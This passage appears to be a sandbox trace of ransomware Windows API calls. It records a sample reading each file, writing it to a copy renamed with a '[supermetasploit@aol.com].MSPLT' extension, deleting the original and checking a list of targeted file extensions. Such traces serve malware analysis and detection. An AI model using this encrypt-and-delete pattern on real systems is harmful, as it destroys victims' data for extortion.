SetEndOfFile (hFile=0x2fc) returned 1 [0172.429] CloseHandle (hObject=0x2fc) returned 1 [0172.429] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3076\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0172.430] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf")) returned 1 [0172.430] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 35 [0172.430] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 35 [0172.430] lstrlenW (lpString=".doc") returned 4 [0172.430] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0172.430] lstrlenW (lpString=".docx") returned 5 [0172.430] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0172.430] lstrlenW (lpString=".pdf") returned 4 [0172.430] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0172.430] lstrlenW (lpString=".xls") returned 4 [0172.430] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0172.430] lstrlenW (lpString=".xlsx") returned 5 [0172.430] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0172.430] lstrlenW (lpString=".ppt") returned 4 [0172.431] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0172.431] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 35 [0172.431] lstrlenW (lpString=".zip") returned 4 [0172.431] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0172.431] lstrlenW (lpString=".rar") returned 4 [0172.431] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0172.431] lstrlenW (lpString=".bz2") returned 4 [0172.431] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0172.431] lstrlenW (lpString=".7z") returned 3 [0172.431] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0172.431] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 35 [0172.431] lstrlenW (lpString=".dbf") returned 4 [0172.431] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0172.431] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 35 [0172.431] lstrlenW (lpString=".1cd") returned 4 [0172.431] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0172.431] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 35 [0172.431] lstrlenW (lpString=".jpg") returned 4 [0172.431] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0172.431] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 35 [0172.431] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 35 [0172.431] lstrlenW (lpString=".doc") returned 4 [0172.431] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0172.431] lstrlenW (lpString=".docx") returned 5 [0172.431] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0172.432] lstrlenW (lpString=".pdf") returned 4 [0172.432] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0172.432] lstrlenW (lpString=".xls") returned 4 [0172.432] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0172.432] lstrlenW (lpString=".xlsx") returned 5 [0172.432] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0172.432] lstrlenW (lpString=".ppt") returned 4 [0172.432] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0172.432] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 35 [0172.432] lstrlenW (lpString=".zip") returned 4 [0172.432] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0172.432] lstrlenW (lpString=".rar") returned 4 [0172.432] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0172.432] lstrlenW (lpString=".bz2") returned 4 [0172.432] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0172.432] lstrlenW (lpString=".7z") returned 3 [0172.432] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0172.432] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 35 [0172.432] lstrlenW (lpString=".dbf") returned 4 [0172.432] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0172.432] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 35 [0172.432] lstrlenW (lpString=".1cd") returned 4 [0172.432] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0172.432] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 35 [0172.432] lstrlenW (lpString=".jpg") returned 4 [0172.432] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0172.433] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0172.433] lstrlenW (lpString="LocalizedData.xml") returned 17 [0172.433] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0172.433] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=60816) returned 1 [0172.433] CloseHandle (hObject=0x2fc) returned 1 [0172.434] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml")) returned 0x80 [0172.434] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0172.434] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0172.434] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0172.434] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0172.434] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0172.435] GetLastError () returned 0x0 [0172.435] ReadFile (in: hFile=0x2fc, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0xed90, lpOverlapped=0x0) returned 1 [0172.438] WriteFile (in: hFile=0x374, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0xeda0, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0xeda0, lpOverlapped=0x0) returned 1 [0172.440] ReadFile (in: hFile=0x2fc, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x0, lpOverlapped=0x0) returned 1 [0172.440] WriteFile (in: hFile=0x374, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0xf6, lpOverlapped=0x0) returned 1 [0172.441] SetEndOfFile (hFile=0x374) returned 1 [0172.441] CloseHandle (hObject=0x374) returned 1 [0172.851] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0172.851] SetEndOfFile (hFile=0x2fc) returned 1 [0172.852] CloseHandle (hObject=0x2fc) returned 1 [0172.852] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0172.853] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml")) returned 1 [0172.853] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 44 [0172.853] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 44 [0172.853] lstrlenW (lpString=".doc") returned 4 [0172.853] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0172.853] lstrlenW (lpString=".docx") returned 5 [0172.853] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0172.853] lstrlenW (lpString=".pdf") returned 4 [0172.853] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0172.853] lstrlenW (lpString=".xls") returned 4 [0172.853] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0172.853] lstrlenW (lpString=".xlsx") returned 5 [0172.853] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0172.853] lstrlenW (lpString=".ppt") returned 4 [0172.853] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0172.854] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 44 [0172.854] lstrlenW (lpString=".zip") returned 4 [0172.854] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0172.854] lstrlenW (lpString=".rar") returned 4 [0172.854] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0172.854] lstrlenW (lpString=".bz2") returned 4 [0172.854] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0172.854] lstrlenW (lpString=".7z") returned 3 [0172.854] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0172.854] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 44 [0172.854] lstrlenW (lpString=".dbf") returned 4 [0172.854] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0172.854] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 44 [0172.854] lstrlenW (lpString=".1cd") returned 4 [0172.854] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0172.854] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 44 [0172.854] lstrlenW (lpString=".jpg") returned 4 [0172.854] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0172.854] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 44 [0172.854] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 44 [0172.854] lstrlenW (lpString=".doc") returned 4 [0172.854] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0172.854] lstrlenW (lpString=".docx") returned 5 [0172.854] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0172.854] lstrlenW (lpString=".pdf") returned 4 [0172.854] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0172.854] lstrlenW (lpString=".xls") returned 4 [0172.854] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0172.854] lstrlenW (lpString=".xlsx") returned 5 [0172.854] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0172.854] lstrlenW (lpString=".ppt") returned 4 [0172.854] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0172.854] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 44 [0172.854] lstrlenW (lpString=".zip") returned 4 [0172.854] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0172.854] lstrlenW (lpString=".rar") returned 4 [0172.855] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0172.855] lstrlenW (lpString=".bz2") returned 4 [0172.855] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0172.855] lstrlenW (lpString=".7z") returned 3 [0172.855] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0172.855] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 44 [0172.855] lstrlenW (lpString=".dbf") returned 4 [0172.855] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0172.855] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 44 [0172.855] lstrlenW (lpString=".1cd") returned 4 [0172.855] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0172.855] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 44 [0172.855] lstrlenW (lpString=".jpg") returned 4 [0172.855] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0172.855] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0172.855] lstrlenW (lpString="Parameterinfo.xml") returned 17 [0172.855] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0172.855] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=93314) returned 1 [0172.855] CloseHandle (hObject=0x2fc) returned 1 [0172.855] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml")) returned 0x80 [0172.856] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0172.856] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0172.856] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0172.856] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0172.856] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0172.856] GetLastError () returned 0x0 [0172.856] ReadFile (in: hFile=0x2fc, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x16c82, lpOverlapped=0x0) returned 1 [0172.868] WriteFile (in: hFile=0x374, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0x16c90, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0x16c90, lpOverlapped=0x0) returned 1 [0172.871] ReadFile (in: hFile=0x2fc, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x0, lpOverlapped=0x0) returned 1 [0172.871] WriteFile (in: hFile=0x374, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0xf6, lpOverlapped=0x0) returned 1 [0172.871] SetEndOfFile (hFile=0x374) returned 1 [0172.871] CloseHandle (hObject=0x374) returned 1 [0172.884] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0172.884] SetEndOfFile (hFile=0x2fc) returned 1 [0172.885] CloseHandle (hObject=0x2fc) returned 1 [0172.886] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0172.886] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml")) returned 1 [0172.886] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 48 [0172.886] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 48 [0172.886] lstrlenW (lpString=".doc") returned 4 [0172.886] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0172.886] lstrlenW (lpString=".docx") returned 5 [0172.886] lstrcmpiW (lpString1=".docx", lpString2="o.xml") returned -1 [0172.886] lstrlenW (lpString=".pdf") returned 4 [0172.886] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0172.886] lstrlenW (lpString=".xls") returned 4 [0172.886] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0172.886] lstrlenW (lpString=".xlsx") returned 5 [0172.886] lstrcmpiW (lpString1=".xlsx", lpString2="o.xml") returned -1 [0172.887] lstrlenW (lpString=".ppt") returned 4 [0172.887] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0172.887] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 48 [0172.887] lstrlenW (lpString=".zip") returned 4 [0172.887] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0172.887] lstrlenW (lpString=".rar") returned 4 [0172.887] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0172.887] lstrlenW (lpString=".bz2") returned 4 [0172.887] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0172.887] lstrlenW (lpString=".7z") returned 3 [0172.887] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0172.887] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 48 [0172.887] lstrlenW (lpString=".dbf") returned 4 [0172.887] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0172.887] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 48 [0172.887] lstrlenW (lpString=".1cd") returned 4 [0172.887] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0172.887] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 48 [0172.887] lstrlenW (lpString=".jpg") returned 4 [0172.887] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0172.887] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 48 [0172.887] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 48 [0172.887] lstrlenW (lpString=".doc") returned 4 [0172.887] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0172.887] lstrlenW (lpString=".docx") returned 5 [0172.887] lstrcmpiW (lpString1=".docx", lpString2="o.xml") returned -1 [0172.887] lstrlenW (lpString=".pdf") returned 4 [0172.887] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0172.887] lstrlenW (lpString=".xls") returned 4 [0172.887] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0172.887] lstrlenW (lpString=".xlsx") returned 5 [0172.887] lstrcmpiW (lpString1=".xlsx", lpString2="o.xml") returned -1 [0172.887] lstrlenW (lpString=".ppt") returned 4 [0172.888] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0172.888] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 48 [0172.888] lstrlenW (lpString=".zip") returned 4 [0172.888] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0172.888] lstrlenW (lpString=".rar") returned 4 [0172.888] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0172.888] lstrlenW (lpString=".bz2") returned 4 [0172.888] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0172.888] lstrlenW (lpString=".7z") returned 3 [0172.888] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0172.888] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 48 [0172.888] lstrlenW (lpString=".dbf") returned 4 [0172.888] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0172.888] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 48 [0172.888] lstrlenW (lpString=".1cd") returned 4 [0172.888] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0172.888] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 48 [0172.888] lstrlenW (lpString=".jpg") returned 4 [0172.888] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0172.888] lstrcmpiW (lpString1=".bmp", lpString2=".MSPLT") returned -1 [0172.888] lstrlenW (lpString="header.bmp") returned 10 [0172.888] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\header.bmp" (normalized: "c:\\588bce7c90097ed212\\header.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0172.900] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=3628) returned 1 [0172.900] CloseHandle (hObject=0x384) returned 1 [0172.900] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\header.bmp" (normalized: "c:\\588bce7c90097ed212\\header.bmp")) returned 0x80 [0172.900] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\header.bmp.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\header.bmp.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0172.901] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\header.bmp" (normalized: "c:\\588bce7c90097ed212\\header.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0172.901] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0172.902] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0172.902] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\header.bmp.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\header.bmp.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0172.903] GetLastError () returned 0x0 [0172.903] ReadFile (in: hFile=0x2fc, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0xe2c, lpOverlapped=0x0) returned 1 [0172.934] WriteFile (in: hFile=0x2f4, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0xe30, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0xe30, lpOverlapped=0x0) returned 1 [0173.114] ReadFile (in: hFile=0x2fc, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x0, lpOverlapped=0x0) returned 1 [0173.114] WriteFile (in: hFile=0x2f4, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0xe8, lpOverlapped=0x0) returned 1 [0173.114] SetEndOfFile (hFile=0x2f4) returned 1 [0173.115] CloseHandle (hObject=0x2f4) returned 1 [0173.116] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0173.116] SetEndOfFile (hFile=0x2fc) returned 1 [0173.117] CloseHandle (hObject=0x2fc) returned 1 [0173.117] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\header.bmp.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0173.117] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\header.bmp" (normalized: "c:\\588bce7c90097ed212\\header.bmp")) returned 1 [0173.118] lstrlenW (lpString="C:\\588bce7c90097ed212\\header.bmp") returned 32 [0173.118] lstrlenW (lpString="C:\\588bce7c90097ed212\\header.bmp") returned 32 [0173.118] lstrlenW (lpString=".doc") returned 4 [0173.118] lstrcmpiW (lpString1=".doc", lpString2=".bmp") returned 1 [0173.118] lstrlenW (lpString=".docx") returned 5 [0173.118] lstrcmpiW (lpString1=".docx", lpString2="r.bmp") returned -1 [0173.118] lstrlenW (lpString=".pdf") returned 4 [0173.118] lstrcmpiW (lpString1=".pdf", lpString2=".bmp") returned 1 [0173.118] lstrlenW (lpString=".xls") returned 4 [0173.118] lstrcmpiW (lpString1=".xls", lpString2=".bmp") returned 1 [0173.118] lstrlenW (lpString=".xlsx") returned 5 [0173.118] lstrcmpiW (lpString1=".xlsx", lpString2="r.bmp") returned -1 [0173.118] lstrlenW (lpString=".ppt") returned 4 [0173.118] lstrcmpiW (lpString1=".ppt", lpString2=".bmp") returned 1 [0173.118] lstrlenW (lpString="C:\\588bce7c90097ed212\\header.bmp") returned 32 [0173.118] lstrlenW (lpString=".zip") returned 4 [0173.118] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0173.118] lstrlenW (lpString=".rar") returned 4 [0173.118] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0173.118] lstrlenW (lpString=".bz2") returned 4 [0173.118] lstrcmpiW (lpString1=".bz2", lpString2=".bmp") returned 1 [0173.118] lstrlenW (lpString=".7z") returned 3 [0173.118] lstrcmpiW (lpString1=".7z", lpString2="bmp") returned -1 [0173.118] lstrlenW (lpString="C:\\588bce7c90097ed212\\header.bmp") returned 32 [0173.118] lstrlenW (lpString=".dbf") returned 4 [0173.118] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0173.118] lstrlenW (lpString="C:\\588bce7c90097ed212\\header.bmp") returned 32 [0173.119] lstrlenW (lpString=".1cd") returned 4 [0173.119] lstrcmpiW (lpString1=".1cd", lpString2=".bmp") returned -1 [0173.119] lstrlenW (lpString="C:\\588bce7c90097ed212\\header.bmp") returned 32 [0173.119] lstrlenW (lpString=".jpg") returned 4 [0173.119] lstrcmpiW (lpString1=".jpg", lpString2=".bmp") returned 1 [0173.119] lstrlenW (lpString="C:\\588bce7c90097ed212\\header.bmp") returned 32 [0173.119] lstrlenW (lpString="C:\\588bce7c90097ed212\\header.bmp") returned 32 [0173.119] lstrlenW (lpString=".doc") returned 4 [0173.119] lstrcmpiW 